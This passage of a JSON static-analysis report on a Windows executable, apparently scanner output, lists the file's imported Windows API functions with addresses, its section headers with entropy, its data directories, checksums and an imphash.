4468. "name": "GetWindowDC",
4469. "address": "0x48f554"
4470. },
4471. {
4472. "name": "GetSystemMetrics",
4473. "address": "0x48f558"
4474. },
4475. {
4476. "name": "GetActiveWindow",
4477. "address": "0x48f55c"
4478. },
4479. {
4480. "name": "CharNextW",
4481. "address": "0x48f560"
4482. },
4483. {
4484. "name": "wsprintfW",
4485. "address": "0x48f564"
4486. },
4487. {
4488. "name": "RedrawWindow",
4489. "address": "0x48f568"
4490. },
4491. {
4492. "name": "DrawMenuBar",
4493. "address": "0x48f56c"
4494. },
4495. {
4496. "name": "DestroyMenu",
4497. "address": "0x48f570"
4498. },
4499. {
4500. "name": "SetMenu",
4501. "address": "0x48f574"
4502. },
4503. {
4504. "name": "GetWindowTextLengthW",
4505. "address": "0x48f578"
4506. },
4507. {
4508. "name": "CreateMenu",
4509. "address": "0x48f57c"
4510. },
4511. {
4512. "name": "IsDlgButtonChecked",
4513. "address": "0x48f580"
4514. },
4515. {
4516. "name": "DefDlgProcW",
4517. "address": "0x48f584"
4518. },
4519. {
4520. "name": "CallWindowProcW",
4521. "address": "0x48f588"
4522. },
4523. {
4524. "name": "ReleaseCapture",
4525. "address": "0x48f58c"
4526. },
4527. {
4528. "name": "SetCapture",
4529. "address": "0x48f590"
4530. },
4531. {
4532. "name": "CreateIconFromResourceEx",
4533. "address": "0x48f594"
4534. },
4535. {
4536. "name": "mouse_event",
4537. "address": "0x48f598"
4538. },
4539. {
4540. "name": "ExitWindowsEx",
4541. "address": "0x48f59c"
4542. },
4543. {
4544. "name": "SetActiveWindow",
4545. "address": "0x48f5a0"
4546. },
4547. {
4548. "name": "FindWindowExW",
4549. "address": "0x48f5a4"
4550. },
4551. {
4552. "name": "EnumThreadWindows",
4553. "address": "0x48f5a8"
4554. },
4555. {
4556. "name": "SetMenuDefaultItem",
4557. "address": "0x48f5ac"
4558. },
4559. {
4560. "name": "InsertMenuItemW",
4561. "address": "0x48f5b0"
4562. },
4563. {
4564. "name": "IsMenu",
4565. "address": "0x48f5b4"
4566. },
4567. {
4568. "name": "TrackPopupMenuEx",
4569. "address": "0x48f5b8"
4570. },
4571. {
4572. "name": "GetCursorPos",
4573. "address": "0x48f5bc"
4574. },
4575. {
4576. "name": "DeleteMenu",
4577. "address": "0x48f5c0"
4578. },
4579. {
4580. "name": "SetRect",
4581. "address": "0x48f5c4"
4582. },
4583. {
4584. "name": "GetMenuItemID",
4585. "address": "0x48f5c8"
4586. },
4587. {
4588. "name": "GetMenuItemCount",
4589. "address": "0x48f5cc"
4590. },
4591. {
4592. "name": "SetMenuItemInfoW",
4593. "address": "0x48f5d0"
4594. },
4595. {
4596. "name": "GetMenuItemInfoW",
4597. "address": "0x48f5d4"
4598. },
4599. {
4600. "name": "SetForegroundWindow",
4601. "address": "0x48f5d8"
4602. },
4603. {
4604. "name": "IsIconic",
4605. "address": "0x48f5dc"
4606. },
4607. {
4608. "name": "FindWindowW",
4609. "address": "0x48f5e0"
4610. },
4611. {
4612. "name": "MonitorFromRect",
4613. "address": "0x48f5e4"
4614. },
4615. {
4616. "name": "keybd_event",
4617. "address": "0x48f5e8"
4618. },
4619. {
4620. "name": "SendInput",
4621. "address": "0x48f5ec"
4622. },
4623. {
4624. "name": "GetAsyncKeyState",
4625. "address": "0x48f5f0"
4626. },
4627. {
4628. "name": "SetKeyboardState",
4629. "address": "0x48f5f4"
4630. },
4631. {
4632. "name": "GetKeyboardState",
4633. "address": "0x48f5f8"
4634. },
4635. {
4636. "name": "GetKeyState",
4637. "address": "0x48f5fc"
4638. },
4639. {
4640. "name": "VkKeyScanW",
4641. "address": "0x48f600"
4642. },
4643. {
4644. "name": "LoadStringW",
4645. "address": "0x48f604"
4646. },
4647. {
4648. "name": "DialogBoxParamW",
4649. "address": "0x48f608"
4650. },
4651. {
4652. "name": "MessageBeep",
4653. "address": "0x48f60c"
4654. },
4655. {
4656. "name": "EndDialog",
4657. "address": "0x48f610"
4658. },
4659. {
4660. "name": "SendDlgItemMessageW",
4661. "address": "0x48f614"
4662. },
4663. {
4664. "name": "GetDlgItem",
4665. "address": "0x48f618"
4666. },
4667. {
4668. "name": "SetWindowTextW",
4669. "address": "0x48f61c"
4670. },
4671. {
4672. "name": "CopyRect",
4673. "address": "0x48f620"
4674. },
4675. {
4676. "name": "ReleaseDC",
4677. "address": "0x48f624"
4678. },
4679. {
4680. "name": "GetDC",
4681. "address": "0x48f628"
4682. },
4683. {
4684. "name": "EndPaint",
4685. "address": "0x48f62c"
4686. },
4687. {
4688. "name": "BeginPaint",
4689. "address": "0x48f630"
4690. },
4691. {
4692. "name": "GetClientRect",
4693. "address": "0x48f634"
4694. },
4695. {
4696. "name": "GetMenu",
4697. "address": "0x48f638"
4698. },
4699. {
4700. "name": "DestroyWindow",
4701. "address": "0x48f63c"
4702. },
4703. {
4704. "name": "EnumWindows",
4705. "address": "0x48f640"
4706. },
4707. {
4708. "name": "GetDesktopWindow",
4709. "address": "0x48f644"
4710. },
4711. {
4712. "name": "IsWindow",
4713. "address": "0x48f648"
4714. },
4715. {
4716. "name": "IsWindowEnabled",
4717. "address": "0x48f64c"
4718. },
4719. {
4720. "name": "IsWindowVisible",
4721. "address": "0x48f650"
4722. },
4723. {
4724. "name": "EnableWindow",
4725. "address": "0x48f654"
4726. },
4727. {
4728. "name": "InvalidateRect",
4729. "address": "0x48f658"
4730. },
4731. {
4732. "name": "GetWindowLongW",
4733. "address": "0x48f65c"
4734. },
4735. {
4736. "name": "GetWindowThreadProcessId",
4737. "address": "0x48f660"
4738. },
4739. {
4740. "name": "AttachThreadInput",
4741. "address": "0x48f664"
4742. },
4743. {
4744. "name": "GetFocus",
4745. "address": "0x48f668"
4746. },
4747. {
4748. "name": "GetWindowTextW",
4749. "address": "0x48f66c"
4750. },
4751. {
4752. "name": "ScreenToClient",
4753. "address": "0x48f670"
4754. },
4755. {
4756. "name": "SendMessageTimeoutW",
4757. "address": "0x48f674"
4758. },
4759. {
4760. "name": "EnumChildWindows",
4761. "address": "0x48f678"
4762. },
4763. {
4764. "name": "CharUpperBuffW",
4765. "address": "0x48f67c"
4766. },
4767. {
4768. "name": "GetParent",
4769. "address": "0x48f680"
4770. },
4771. {
4772. "name": "GetDlgCtrlID",
4773. "address": "0x48f684"
4774. },
4775. {
4776. "name": "SendMessageW",
4777. "address": "0x48f688"
4778. },
4779. {
4780. "name": "MapVirtualKeyW",
4781. "address": "0x48f68c"
4782. },
4783. {
4784. "name": "PostMessageW",
4785. "address": "0x48f690"
4786. },
4787. {
4788. "name": "GetWindowRect",
4789. "address": "0x48f694"
4790. },
4791. {
4792. "name": "SetUserObjectSecurity",
4793. "address": "0x48f698"
4794. },
4795. {
4796. "name": "CloseDesktop",
4797. "address": "0x48f69c"
4798. },
4799. {
4800. "name": "CloseWindowStation",
4801. "address": "0x48f6a0"
4802. },
4803. {
4804. "name": "OpenDesktopW",
4805. "address": "0x48f6a4"
4806. },
4807. {
4808. "name": "SetProcessWindowStation",
4809. "address": "0x48f6a8"
4810. },
4811. {
4812. "name": "GetProcessWindowStation",
4813. "address": "0x48f6ac"
4814. },
4815. {
4816. "name": "OpenWindowStationW",
4817. "address": "0x48f6b0"
4818. },
4819. {
4820. "name": "GetUserObjectSecurity",
4821. "address": "0x48f6b4"
4822. },
4823. {
4824. "name": "MessageBoxW",
4825. "address": "0x48f6b8"
4826. },
4827. {
4828. "name": "DefWindowProcW",
4829. "address": "0x48f6bc"
4830. },
4831. {
4832. "name": "SetClipboardData",
4833. "address": "0x48f6c0"
4834. },
4835. {
4836. "name": "EmptyClipboard",
4837. "address": "0x48f6c4"
4838. },
4839. {
4840. "name": "CountClipboardFormats",
4841. "address": "0x48f6c8"
4842. },
4843. {
4844. "name": "CloseClipboard",
4845. "address": "0x48f6cc"
4846. },
4847. {
4848. "name": "GetClipboardData",
4849. "address": "0x48f6d0"
4850. },
4851. {
4852. "name": "IsClipboardFormatAvailable",
4853. "address": "0x48f6d4"
4854. },
4855. {
4856. "name": "OpenClipboard",
4857. "address": "0x48f6d8"
4858. },
4859. {
4860. "name": "BlockInput",
4861. "address": "0x48f6dc"
4862. },
4863. {
4864. "name": "GetMessageW",
4865. "address": "0x48f6e0"
4866. },
4867. {
4868. "name": "LockWindowUpdate",
4869. "address": "0x48f6e4"
4870. },
4871. {
4872. "name": "DispatchMessageW",
4873. "address": "0x48f6e8"
4874. },
4875. {
4876. "name": "TranslateMessage",
4877. "address": "0x48f6ec"
4878. },
4879. {
4880. "name": "PeekMessageW",
4881. "address": "0x48f6f0"
4882. },
4883. {
4884. "name": "UnregisterHotKey",
4885. "address": "0x48f6f4"
4886. },
4887. {
4888. "name": "CheckMenuRadioItem",
4889. "address": "0x48f6f8"
4890. },
4891. {
4892. "name": "CharLowerBuffW",
4893. "address": "0x48f6fc"
4894. },
4895. {
4896. "name": "MoveWindow",
4897. "address": "0x48f700"
4898. },
4899. {
4900. "name": "SetFocus",
4901. "address": "0x48f704"
4902. },
4903. {
4904. "name": "PostQuitMessage",
4905. "address": "0x48f708"
4906. },
4907. {
4908. "name": "KillTimer",
4909. "address": "0x48f70c"
4910. },
4911. {
4912. "name": "CreatePopupMenu",
4913. "address": "0x48f710"
4914. },
4915. {
4916. "name": "RegisterWindowMessageW",
4917. "address": "0x48f714"
4918. },
4919. {
4920. "name": "SetTimer",
4921. "address": "0x48f718"
4922. },
4923. {
4924. "name": "ShowWindow",
4925. "address": "0x48f71c"
4926. },
4927. {
4928. "name": "CreateWindowExW",
4929. "address": "0x48f720"
4930. },
4931. {
4932. "name": "RegisterClassExW",
4933. "address": "0x48f724"
4934. },
4935. {
4936. "name": "LoadIconW",
4937. "address": "0x48f728"
4938. },
4939. {
4940. "name": "LoadCursorW",
4941. "address": "0x48f72c"
4942. },
4943. {
4944. "name": "GetSysColorBrush",
4945. "address": "0x48f730"
4946. },
4947. {
4948. "name": "GetForegroundWindow",
4949. "address": "0x48f734"
4950. },
4951. {
4952. "name": "MessageBoxA",
4953. "address": "0x48f738"
4954. },
4955. {
4956. "name": "DestroyIcon",
4957. "address": "0x48f73c"
4958. },
4959. {
4960. "name": "SystemParametersInfoW",
4961. "address": "0x48f740"
4962. },
4963. {
4964. "name": "LoadImageW",
4965. "address": "0x48f744"
4966. },
4967. {
4968. "name": "GetClassNameW",
4969. "address": "0x48f748"
4970. }
4971. ],
4972. "dll": "USER32.dll"
4973. },
4974. {
4975. "imports": [
4976. {
4977. "name": "StrokePath",
4978. "address": "0x48f0c4"
4979. },
4980. {
4981. "name": "DeleteObject",
4982. "address": "0x48f0c8"
4983. },
4984. {
4985. "name": "GetTextExtentPoint32W",
4986. "address": "0x48f0cc"
4987. },
4988. {
4989. "name": "ExtCreatePen",
4990. "address": "0x48f0d0"
4991. },
4992. {
4993. "name": "GetDeviceCaps",
4994. "address": "0x48f0d4"
4995. },
4996. {
4997. "name": "EndPath",
4998. "address": "0x48f0d8"
4999. },
5000. {
5001. "name": "SetPixel",
5002. "address": "0x48f0dc"
5003. },
5004. {
5005. "name": "CloseFigure",
5006. "address": "0x48f0e0"
5007. },
5008. {
5009. "name": "CreateCompatibleBitmap",
5010. "address": "0x48f0e4"
5011. },
5012. {
5013. "name": "CreateCompatibleDC",
5014. "address": "0x48f0e8"
5015. },
5016. {
5017. "name": "SelectObject",
5018. "address": "0x48f0ec"
5019. },
5020. {
5021. "name": "StretchBlt",
5022. "address": "0x48f0f0"
5023. },
5024. {
5025. "name": "GetDIBits",
5026. "address": "0x48f0f4"
5027. },
5028. {
5029. "name": "LineTo",
5030. "address": "0x48f0f8"
5031. },
5032. {
5033. "name": "AngleArc",
5034. "address": "0x48f0fc"
5035. },
5036. {
5037. "name": "MoveToEx",
5038. "address": "0x48f100"
5039. },
5040. {
5041. "name": "Ellipse",
5042. "address": "0x48f104"
5043. },
5044. {
5045. "name": "DeleteDC",
5046. "address": "0x48f108"
5047. },
5048. {
5049. "name": "GetPixel",
5050. "address": "0x48f10c"
5051. },
5052. {
5053. "name": "CreateDCW",
5054. "address": "0x48f110"
5055. },
5056. {
5057. "name": "GetStockObject",
5058. "address": "0x48f114"
5059. },
5060. {
5061. "name": "GetTextFaceW",
5062. "address": "0x48f118"
5063. },
5064. {
5065. "name": "CreateFontW",
5066. "address": "0x48f11c"
5067. },
5068. {
5069. "name": "SetTextColor",
5070. "address": "0x48f120"
5071. },
5072. {
5073. "name": "PolyDraw",
5074. "address": "0x48f124"
5075. },
5076. {
5077. "name": "BeginPath",
5078. "address": "0x48f128"
5079. },
5080. {
5081. "name": "Rectangle",
5082. "address": "0x48f12c"
5083. },
5084. {
5085. "name": "SetViewportOrgEx",
5086. "address": "0x48f130"
5087. },
5088. {
5089. "name": "GetObjectW",
5090. "address": "0x48f134"
5091. },
5092. {
5093. "name": "SetBkMode",
5094. "address": "0x48f138"
5095. },
5096. {
5097. "name": "RoundRect",
5098. "address": "0x48f13c"
5099. },
5100. {
5101. "name": "SetBkColor",
5102. "address": "0x48f140"
5103. },
5104. {
5105. "name": "CreatePen",
5106. "address": "0x48f144"
5107. },
5108. {
5109. "name": "CreateSolidBrush",
5110. "address": "0x48f148"
5111. },
5112. {
5113. "name": "StrokeAndFillPath",
5114. "address": "0x48f14c"
5115. }
5116. ],
5117. "dll": "GDI32.dll"
5118. },
5119. {
5120. "imports": [
5121. {
5122. "name": "GetOpenFileNameW",
5123. "address": "0x48f0b8"
5124. },
5125. {
5126. "name": "GetSaveFileNameW",
5127. "address": "0x48f0bc"
5128. }
5129. ],
5130. "dll": "COMDLG32.dll"
5131. },
5132. {
5133. "imports": [
5134. {
5135. "name": "GetAce",
5136. "address": "0x48f000"
5137. },
5138. {
5139. "name": "RegEnumValueW",
5140. "address": "0x48f004"
5141. },
5142. {
5143. "name": "RegDeleteValueW",
5144. "address": "0x48f008"
5145. },
5146. {
5147. "name": "RegDeleteKeyW",
5148. "address": "0x48f00c"
5149. },
5150. {
5151. "name": "RegEnumKeyExW",
5152. "address": "0x48f010"
5153. },
5154. {
5155. "name": "RegSetValueExW",
5156. "address": "0x48f014"
5157. },
5158. {
5159. "name": "RegOpenKeyExW",
5160. "address": "0x48f018"
5161. },
5162. {
5163. "name": "RegCloseKey",
5164. "address": "0x48f01c"
5165. },
5166. {
5167. "name": "RegQueryValueExW",
5168. "address": "0x48f020"
5169. },
5170. {
5171. "name": "RegConnectRegistryW",
5172. "address": "0x48f024"
5173. },
5174. {
5175. "name": "InitializeSecurityDescriptor",
5176. "address": "0x48f028"
5177. },
5178. {
5179. "name": "InitializeAcl",
5180. "address": "0x48f02c"
5181. },
5182. {
5183. "name": "AdjustTokenPrivileges",
5184. "address": "0x48f030"
5185. },
5186. {
5187. "name": "OpenThreadToken",
5188. "address": "0x48f034"
5189. },
5190. {
5191. "name": "OpenProcessToken",
5192. "address": "0x48f038"
5193. },
5194. {
5195. "name": "LookupPrivilegeValueW",
5196. "address": "0x48f03c"
5197. },
5198. {
5199. "name": "DuplicateTokenEx",
5200. "address": "0x48f040"
5201. },
5202. {
5203. "name": "CreateProcessAsUserW",
5204. "address": "0x48f044"
5205. },
5206. {
5207. "name": "CreateProcessWithLogonW",
5208. "address": "0x48f048"
5209. },
5210. {
5211. "name": "GetLengthSid",
5212. "address": "0x48f04c"
5213. },
5214. {
5215. "name": "CopySid",
5216. "address": "0x48f050"
5217. },
5218. {
5219. "name": "LogonUserW",
5220. "address": "0x48f054"
5221. },
5222. {
5223. "name": "AllocateAndInitializeSid",
5224. "address": "0x48f058"
5225. },
5226. {
5227. "name": "CheckTokenMembership",
5228. "address": "0x48f05c"
5229. },
5230. {
5231. "name": "RegCreateKeyExW",
5232. "address": "0x48f060"
5233. },
5234. {
5235. "name": "FreeSid",
5236. "address": "0x48f064"
5237. },
5238. {
5239. "name": "GetTokenInformation",
5240. "address": "0x48f068"
5241. },
5242. {
5243. "name": "GetSecurityDescriptorDacl",
5244. "address": "0x48f06c"
5245. },
5246. {
5247. "name": "GetAclInformation",
5248. "address": "0x48f070"
5249. },
5250. {
5251. "name": "AddAce",
5252. "address": "0x48f074"
5253. },
5254. {
5255. "name": "SetSecurityDescriptorDacl",
5256. "address": "0x48f078"
5257. },
5258. {
5259. "name": "GetUserNameW",
5260. "address": "0x48f07c"
5261. },
5262. {
5263. "name": "InitiateSystemShutdownExW",
5264. "address": "0x48f080"
5265. }
5266. ],
5267. "dll": "ADVAPI32.dll"
5268. },
5269. {
5270. "imports": [
5271. {
5272. "name": "DragQueryPoint",
5273. "address": "0x48f48c"
5274. },
5275. {
5276. "name": "ShellExecuteExW",
5277. "address": "0x48f490"
5278. },
5279. {
5280. "name": "DragQueryFileW",
5281. "address": "0x48f494"
5282. },
5283. {
5284. "name": "SHEmptyRecycleBinW",
5285. "address": "0x48f498"
5286. },
5287. {
5288. "name": "SHGetPathFromIDListW",
5289. "address": "0x48f49c"
5290. },
5291. {
5292. "name": "SHBrowseForFolderW",
5293. "address": "0x48f4a0"
5294. },
5295. {
5296. "name": "SHCreateShellItem",
5297. "address": "0x48f4a4"
5298. },
5299. {
5300. "name": "SHGetDesktopFolder",
5301. "address": "0x48f4a8"
5302. },
5303. {
5304. "name": "SHGetSpecialFolderLocation",
5305. "address": "0x48f4ac"
5306. },
5307. {
5308. "name": "SHGetFolderPathW",
5309. "address": "0x48f4b0"
5310. },
5311. {
5312. "name": "SHFileOperationW",
5313. "address": "0x48f4b4"
5314. },
5315. {
5316. "name": "ExtractIconExW",
5317. "address": "0x48f4b8"
5318. },
5319. {
5320. "name": "Shell_NotifyIconW",
5321. "address": "0x48f4bc"
5322. },
5323. {
5324. "name": "ShellExecuteW",
5325. "address": "0x48f4c0"
5326. },
5327. {
5328. "name": "DragFinish",
5329. "address": "0x48f4c4"
5330. }
5331. ],
5332. "dll": "SHELL32.dll"
5333. },
5334. {
5335. "imports": [
5336. {
5337. "name": "CoTaskMemAlloc",
5338. "address": "0x48f828"
5339. },
5340. {
5341. "name": "CoTaskMemFree",
5342. "address": "0x48f82c"
5343. },
5344. {
5345. "name": "CLSIDFromString",
5346. "address": "0x48f830"
5347. },
5348. {
5349. "name": "ProgIDFromCLSID",
5350. "address": "0x48f834"
5351. },
5352. {
5353. "name": "CLSIDFromProgID",
5354. "address": "0x48f838"
5355. },
5356. {
5357. "name": "OleSetMenuDescriptor",
5358. "address": "0x48f83c"
5359. },
5360. {
5361. "name": "MkParseDisplayName",
5362. "address": "0x48f840"
5363. },
5364. {
5365. "name": "OleSetContainedObject",
5366. "address": "0x48f844"
5367. },
5368. {
5369. "name": "CoCreateInstance",
5370. "address": "0x48f848"
5371. },
5372. {
5373. "name": "IIDFromString",
5374. "address": "0x48f84c"
5375. },
5376. {
5377. "name": "StringFromGUID2",
5378. "address": "0x48f850"
5379. },
5380. {
5381. "name": "CreateStreamOnHGlobal",
5382. "address": "0x48f854"
5383. },
5384. {
5385. "name": "OleInitialize",
5386. "address": "0x48f858"
5387. },
5388. {
5389. "name": "OleUninitialize",
5390. "address": "0x48f85c"
5391. },
5392. {
5393. "name": "CoInitialize",
5394. "address": "0x48f860"
5395. },
5396. {
5397. "name": "CoUninitialize",
5398. "address": "0x48f864"
5399. },
5400. {
5401. "name": "GetRunningObjectTable",
5402. "address": "0x48f868"
5403. },
5404. {
5405. "name": "CoGetInstanceFromFile",
5406. "address": "0x48f86c"
5407. },
5408. {
5409. "name": "CoGetObject",
5410. "address": "0x48f870"
5411. },
5412. {
5413. "name": "CoSetProxyBlanket",
5414. "address": "0x48f874"
5415. },
5416. {
5417. "name": "CoCreateInstanceEx",
5418. "address": "0x48f878"
5419. },
5420. {
5421. "name": "CoInitializeSecurity",
5422. "address": "0x48f87c"
5423. }
5424. ],
5425. "dll": "ole32.dll"
5426. },
5427. {
5428. "imports": [
5429. {
5430. "name": "LoadTypeLibEx",
5431. "address": "0x48f40c"
5432. },
5433. {
5434. "name": "VariantCopyInd",
5435. "address": "0x48f410"
5436. },
5437. {
5438. "name": "SysReAllocString",
5439. "address": "0x48f414"
5440. },
5441. {
5442. "name": "SysFreeString",
5443. "address": "0x48f418"
5444. },
5445. {
5446. "name": "SafeArrayDestroyDescriptor",
5447. "address": "0x48f41c"
5448. },
5449. {
5450. "name": "SafeArrayDestroyData",
5451. "address": "0x48f420"
5452. },
5453. {
5454. "name": "SafeArrayUnaccessData",
5455. "address": "0x48f424"
5456. },
5457. {
5458. "name": "SafeArrayAccessData",
5459. "address": "0x48f428"
5460. },
5461. {
5462. "name": "SafeArrayAllocData",
5463. "address": "0x48f42c"
5464. },
5465. {
5466. "name": "SafeArrayAllocDescriptorEx",
5467. "address": "0x48f430"
5468. },
5469. {
5470. "name": "SafeArrayCreateVector",
5471. "address": "0x48f434"
5472. },
5473. {
5474. "name": "RegisterTypeLib",
5475. "address": "0x48f438"
5476. },
5477. {
5478. "name": "CreateStdDispatch",
5479. "address": "0x48f43c"
5480. },
5481. {
5482. "name": "DispCallFunc",
5483. "address": "0x48f440"
5484. },
5485. {
5486. "name": "VariantChangeType",
5487. "address": "0x48f444"
5488. },
5489. {
5490. "name": "SysStringLen",
5491. "address": "0x48f448"
5492. },
5493. {
5494. "name": "VariantTimeToSystemTime",
5495. "address": "0x48f44c"
5496. },
5497. {
5498. "name": "VarR8FromDec",
5499. "address": "0x48f450"
5500. },
5501. {
5502. "name": "SafeArrayGetVartype",
5503. "address": "0x48f454"
5504. },
5505. {
5506. "name": "VariantCopy",
5507. "address": "0x48f458"
5508. },
5509. {
5510. "name": "VariantClear",
5511. "address": "0x48f45c"
5512. },
5513. {
5514. "name": "OleLoadPicture",
5515. "address": "0x48f460"
5516. },
5517. {
5518. "name": "QueryPathOfRegTypeLib",
5519. "address": "0x48f464"
5520. },
5521. {
5522. "name": "RegisterTypeLibForUser",
5523. "address": "0x48f468"
5524. },
5525. {
5526. "name": "UnRegisterTypeLibForUser",
5527. "address": "0x48f46c"
5528. },
5529. {
5530. "name": "UnRegisterTypeLib",
5531. "address": "0x48f470"
5532. },
5533. {
5534. "name": "CreateDispTypeInfo",
5535. "address": "0x48f474"
5536. },
5537. {
5538. "name": "SysAllocString",
5539. "address": "0x48f478"
5540. },
5541. {
5542. "name": "VariantInit",
5543. "address": "0x48f47c"
5544. }
5545. ],
5546. "dll": "OLEAUT32.dll"
5547. }
5548. ],
5549. "digital_signers": null,
5550. "exported_dll_name": null,
5551. "actual_checksum": "0x0018a386",
5552. "overlay": null,
5553. "imagebase": "0x00400000",
5554. "reported_checksum": "0x00171d9c",
5555. "icon_hash": null,
5556. "entrypoint": "0x0042800a",
5557. "timestamp": "2019-06-25 20:45:42",
5558. "osversion": "5.1",
5559. "sections": [
5560. {
5561. "name": ".text",
5562. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
5563. "virtual_address": "0x00001000",
5564. "size_of_data": "0x0008e000",
5565. "entropy": "6.68",
5566. "raw_address": "0x00000400",
5567. "virtual_size": "0x0008dfdd",
5568. "characteristics_raw": "0x60000020"
5569. },
5570. {
5571. "name": ".rdata",
5572. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
5573. "virtual_address": "0x0008f000",
5574. "size_of_data": "0x0002fe00",
5575. "entropy": "5.76",
5576. "raw_address": "0x0008e400",
5577. "virtual_size": "0x0002fd8e",
5578. "characteristics_raw": "0x40000040"
5579. },
5580. {
5581. "name": ".data",
5582. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
5583. "virtual_address": "0x000bf000",
5584. "size_of_data": "0x00005200",
5585. "entropy": "1.20",
5586. "raw_address": "0x000be200",
5587. "virtual_size": "0x00008f74",
5588. "characteristics_raw": "0xc0000040"
5589. },
5590. {
5591. "name": ".rsrc",
5592. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
5593. "virtual_address": "0x000c8000",
5594. "size_of_data": "0x000be000",
5595. "entropy": "7.96",
5596. "raw_address": "0x000c3400",
5597. "virtual_size": "0x000bdf40",
5598. "characteristics_raw": "0x40000040"
5599. },
5600. {
5601. "name": ".reloc",
5602. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
5603. "virtual_address": "0x00186000",
5604. "size_of_data": "0x00007200",
5605. "entropy": "6.78",
5606. "raw_address": "0x00181400",
5607. "virtual_size": "0x00007134",
5608. "characteristics_raw": "0x42000040"
5609. }
5610. ],
5611. "resources": [],
5612. "dirents": [
5613. {
5614. "virtual_address": "0x00000000",
5615. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
5616. "size": "0x00000000"
5617. },
5618. {
5619. "virtual_address": "0x000bc0cc",
5620. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
5621. "size": "0x0000017c"
5622. },
5623. {
5624. "virtual_address": "0x000c8000",
5625. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
5626. "size": "0x000bdf40"
5627. },
5628. {
5629. "virtual_address": "0x00000000",
5630. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
5631. "size": "0x00000000"
5632. },
5633. {
5634. "virtual_address": "0x00000000",
5635. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
5636. "size": "0x00000000"
5637. },
5638. {
5639. "virtual_address": "0x00186000",
5640. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
5641. "size": "0x00007134"
5642. },
5643. {
5644. "virtual_address": "0x00092bc0",
5645. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
5646. "size": "0x0000001c"
5647. },
5648. {
5649. "virtual_address": "0x00000000",
5650. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
5651. "size": "0x00000000"
5652. },
5653. {
5654. "virtual_address": "0x00000000",
5655. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
5656. "size": "0x00000000"
5657. },
5658. {
5659. "virtual_address": "0x00000000",
5660. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
5661. "size": "0x00000000"
5662. },
5663. {
5664. "virtual_address": "0x000a4b50",
5665. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
5666. "size": "0x00000040"
5667. },
5668. {
5669. "virtual_address": "0x00000000",
5670. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
5671. "size": "0x00000000"
5672. },
5673. {
5674. "virtual_address": "0x0008f000",
5675. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
5676. "size": "0x00000884"
5677. },
5678. {
5679. "virtual_address": "0x00000000",
5680. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
5681. "size": "0x00000000"
5682. },
5683. {
5684. "virtual_address": "0x00000000",
5685. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
5686. "size": "0x00000000"
5687. },
5688. {
5689. "virtual_address": "0x00000000",
5690. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
5691. "size": "0x00000000"
5692. }
5693. ],
5694. "exports": [],
5695. "guest_signers": {},
5696. "imphash": "afcdf79be1557326c854b6e20cb900a7",
5697. "icon_fuzzy": null,
5698. "icon": null,
5699. "pdbpath": null,
5700. "imported_dll_count": 18,
5701. "versioninfo": []
5702. }
5703. }